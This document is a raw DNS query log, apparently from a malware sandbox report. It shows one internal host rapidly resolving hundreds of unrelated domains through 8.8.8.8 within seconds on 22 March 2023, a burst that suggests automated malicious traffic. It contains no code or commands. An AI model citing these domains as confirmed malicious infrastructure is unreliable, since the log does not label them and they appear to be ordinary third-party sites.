                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.193625927 CET192.168.2.58.8.8.80x5fadStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.251280069 CET192.168.2.58.8.8.80x1accStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.281043053 CET192.168.2.58.8.8.80xdeebStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.344986916 CET192.168.2.58.8.8.80x1691Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.374855995 CET192.168.2.58.8.8.80x2b83Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.527863026 CET192.168.2.58.8.8.80xa5deStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.578535080 CET192.168.2.58.8.8.80x1cb0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.660480022 CET192.168.2.58.8.8.80x90b2Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.708883047 CET192.168.2.58.8.8.80x1853Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:41.965378046 CET192.168.2.58.8.8.80x413dStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.005398035 CET192.168.2.58.8.8.80xfb4fStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.281246901 CET192.168.2.58.8.8.80xdeebStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.304172039 CET192.168.2.58.8.8.80xbe55Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.390697002 CET192.168.2.58.8.8.80x2b83Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.460866928 CET192.168.2.58.8.8.80xca03Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:42.593923092 CET192.168.2.58.8.8.80x1cb0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.051588058 CET192.168.2.58.8.8.80xd051Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.079871893 CET192.168.2.58.8.8.80x5d47Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.208520889 CET192.168.2.58.8.8.80x51a3Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.209017992 CET192.168.2.58.8.8.80x524eStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.556323051 CET192.168.2.58.8.8.80x7bdfStandard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.586148024 CET192.168.2.58.8.8.80x2f95Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.772450924 CET192.168.2.58.8.8.80xb9e6Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:43.845036030 CET192.168.2.58.8.8.80xf1c5Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.297071934 CET192.168.2.58.8.8.80xdeebStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.363234997 CET192.168.2.58.8.8.80x5b36Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.390966892 CET192.168.2.58.8.8.80x2b83Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.410331011 CET192.168.2.58.8.8.80x53ceStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.609463930 CET192.168.2.58.8.8.80x1cb0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.696222067 CET192.168.2.58.8.8.80xbae3Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.697376013 CET192.168.2.58.8.8.80x42ddStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:44.788320065 CET192.168.2.58.8.8.80xa6faStandard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.145216942 CET192.168.2.58.8.8.80x645eStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.321762085 CET192.168.2.58.8.8.80x58cfStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.398699999 CET192.168.2.58.8.8.80x552Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.598289967 CET192.168.2.58.8.8.80xaa8bStandard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.612915993 CET192.168.2.58.8.8.80xc992Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.727041006 CET192.168.2.58.8.8.80xe33Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:45.836169004 CET192.168.2.58.8.8.80x6a37Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.314193964 CET192.168.2.58.8.8.80x633fStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.328219891 CET192.168.2.58.8.8.80x58cfStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.339703083 CET192.168.2.58.8.8.80x9431Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.351413012 CET192.168.2.58.8.8.80x6d79Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.406486034 CET192.168.2.58.8.8.80x552Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.609563112 CET192.168.2.58.8.8.80xc992Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.614514112 CET192.168.2.58.8.8.80x7d0eStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.691505909 CET192.168.2.58.8.8.80x9802Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:46.710530043 CET192.168.2.58.8.8.80xad05Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.258110046 CET192.168.2.58.8.8.80x778cStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.346183062 CET192.168.2.58.8.8.80x58cfStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.346218109 CET192.168.2.58.8.8.80x9431Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.406775951 CET192.168.2.58.8.8.80x552Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.552613974 CET192.168.2.58.8.8.80x2e49Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.609504938 CET192.168.2.58.8.8.80xc992Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.772205114 CET192.168.2.58.8.8.80x4aabStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.803522110 CET192.168.2.58.8.8.80xcd12Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.831197023 CET192.168.2.58.8.8.80x1803Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:47.857497931 CET192.168.2.58.8.8.80x58dbStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.162734032 CET192.168.2.58.8.8.80xa7c9Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.456101894 CET192.168.2.58.8.8.80x5183Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.536072969 CET192.168.2.58.8.8.80x5833Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.537137032 CET192.168.2.58.8.8.80xec1cStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.709522009 CET192.168.2.58.8.8.80x6fadStandard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:48.715737104 CET192.168.2.58.8.8.80x973cStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.106370926 CET192.168.2.58.8.8.80x4aafStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.204612017 CET192.168.2.58.8.8.80xb79dStandard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.362166882 CET192.168.2.58.8.8.80x58cfStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.796456099 CET192.168.2.58.8.8.80x552Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.797525883 CET192.168.2.58.8.8.80xc992Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.800303936 CET192.168.2.58.8.8.80xc04bStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.805927038 CET192.168.2.58.8.8.80x3f15Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.807739019 CET192.168.2.58.8.8.80xd528Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:49.825839996 CET192.168.2.58.8.8.80xb94eStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:50.072019100 CET192.168.2.58.8.8.80x94ceStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.562205076 CET192.168.2.58.8.8.80xc3c1Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.565257072 CET192.168.2.58.8.8.80xf3bbStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.570862055 CET192.168.2.58.8.8.80x94c7Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.572266102 CET192.168.2.58.8.8.80xa006Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.788058043 CET192.168.2.58.8.8.80x4462Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.819220066 CET192.168.2.58.8.8.80x7fa0Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.961026907 CET192.168.2.58.8.8.80x132cStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:51.964447021 CET192.168.2.58.8.8.80x24d0Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.208024025 CET192.168.2.58.8.8.80x379cStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.401523113 CET192.168.2.58.8.8.80x288eStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.479140043 CET192.168.2.58.8.8.80xc392Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.650747061 CET192.168.2.58.8.8.80x8116Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.846498013 CET192.168.2.58.8.8.80xcb2dStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:52.864171028 CET192.168.2.58.8.8.80x5c49Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:53.257437944 CET192.168.2.58.8.8.80x6ce1Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:53.270397902 CET192.168.2.58.8.8.80x5de8Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:53.349453926 CET192.168.2.58.8.8.80x373eStandard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:53.365104914 CET192.168.2.58.8.8.80x6096Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.145716906 CET192.168.2.58.8.8.80xa666Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.360136032 CET192.168.2.58.8.8.80x6096Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.403054953 CET192.168.2.58.8.8.80xed4Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.912265062 CET192.168.2.58.8.8.80xa956Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.937700987 CET192.168.2.58.8.8.80x49b4Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:54.965897083 CET192.168.2.58.8.8.80xf98dStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.367935896 CET192.168.2.58.8.8.80xfe12Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.368143082 CET192.168.2.58.8.8.80x6b9cStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.368412018 CET192.168.2.58.8.8.80x8a86Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.368776083 CET192.168.2.58.8.8.80x6df9Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.369390965 CET192.168.2.58.8.8.80x3919Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.369829893 CET192.168.2.58.8.8.80x3d2aStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.386353016 CET192.168.2.58.8.8.80x6096Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.388432026 CET192.168.2.58.8.8.80x73d4Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.389936924 CET192.168.2.58.8.8.80x3794Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.390840054 CET192.168.2.58.8.8.80xb53dStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.392813921 CET192.168.2.58.8.8.80x64fdStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.393606901 CET192.168.2.58.8.8.80x9071Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.393721104 CET192.168.2.58.8.8.80xb4f6Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.394062042 CET192.168.2.58.8.8.80xf199Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.394150972 CET192.168.2.58.8.8.80x5035Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.420696974 CET192.168.2.58.8.8.80xe023Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.427268028 CET192.168.2.58.8.8.80xa6daStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.428119898 CET192.168.2.58.8.8.80x8daStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.429697990 CET192.168.2.58.8.8.80xf358Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.430419922 CET192.168.2.58.8.8.80x7084Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.434611082 CET192.168.2.58.8.8.80x66cdStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.435254097 CET192.168.2.58.8.8.80x86dStandard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.438368082 CET192.168.2.58.8.8.80xa76fStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.440344095 CET192.168.2.58.8.8.80x31e2Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.442012072 CET192.168.2.58.8.8.80x6828Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.455475092 CET192.168.2.58.8.8.80x5466Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.472063065 CET192.168.2.58.8.8.80x91adStandard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.475219011 CET192.168.2.58.8.8.80xf2b2Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.476150036 CET192.168.2.58.8.8.80x3a69Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.479916096 CET192.168.2.58.8.8.80xbfc8Standard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.480940104 CET192.168.2.58.8.8.80xaea9Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.481482983 CET192.168.2.58.8.8.80x6e95Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.481684923 CET192.168.2.58.8.8.80x265eStandard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.482233047 CET192.168.2.58.8.8.80xdc19Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.484014034 CET192.168.2.58.8.8.80xb53cStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.485789061 CET192.168.2.58.8.8.80x5182Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.488445997 CET192.168.2.58.8.8.80xe408Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.489844084 CET192.168.2.58.8.8.80xb475Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.491393089 CET192.168.2.58.8.8.80x986dStandard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.497397900 CET192.168.2.58.8.8.80xcffaStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.505826950 CET192.168.2.58.8.8.80xd5bStandard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.507868052 CET192.168.2.58.8.8.80x2942Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.507996082 CET192.168.2.58.8.8.80xdc6Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.508436918 CET192.168.2.58.8.8.80xe5cbStandard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.508857012 CET192.168.2.58.8.8.80xea72Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.508965015 CET192.168.2.58.8.8.80x8de1Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.509493113 CET192.168.2.58.8.8.80xa4e5Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.509773970 CET192.168.2.58.8.8.80x2dffStandard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.510242939 CET192.168.2.58.8.8.80xe385Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.520416021 CET192.168.2.58.8.8.80xbde9Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.520792007 CET192.168.2.58.8.8.80xd05eStandard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.524717093 CET192.168.2.58.8.8.80xb763Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.524887085 CET192.168.2.58.8.8.80x5685Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.526334047 CET192.168.2.58.8.8.80xa0b5Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.526453972 CET192.168.2.58.8.8.80xd558Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.533958912 CET192.168.2.58.8.8.80x401fStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.535284042 CET192.168.2.58.8.8.80x23cfStandard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.537108898 CET192.168.2.58.8.8.80xd255Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.538048029 CET192.168.2.58.8.8.80xad51Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.538810015 CET192.168.2.58.8.8.80x2abdStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.539457083 CET192.168.2.58.8.8.80x2166Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.540919065 CET192.168.2.58.8.8.80xd6dcStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.542237043 CET192.168.2.58.8.8.80x84a1Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.545053005 CET192.168.2.58.8.8.80xcf1Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.546437979 CET192.168.2.58.8.8.80x3873Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.550427914 CET192.168.2.58.8.8.80x8db8Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.551687002 CET192.168.2.58.8.8.80xe79cStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.554913998 CET192.168.2.58.8.8.80x392fStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.555433989 CET192.168.2.58.8.8.80x404bStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.558362961 CET192.168.2.58.8.8.80xa034Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.559745073 CET192.168.2.58.8.8.80x8c3bStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.579773903 CET192.168.2.58.8.8.80x451eStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.580957890 CET192.168.2.58.8.8.80x41a8Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.583818913 CET192.168.2.58.8.8.80x98d4Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.608537912 CET192.168.2.58.8.8.80x6ec3Standard query (0)toundo.netA (IP address)IN (0x0001)false
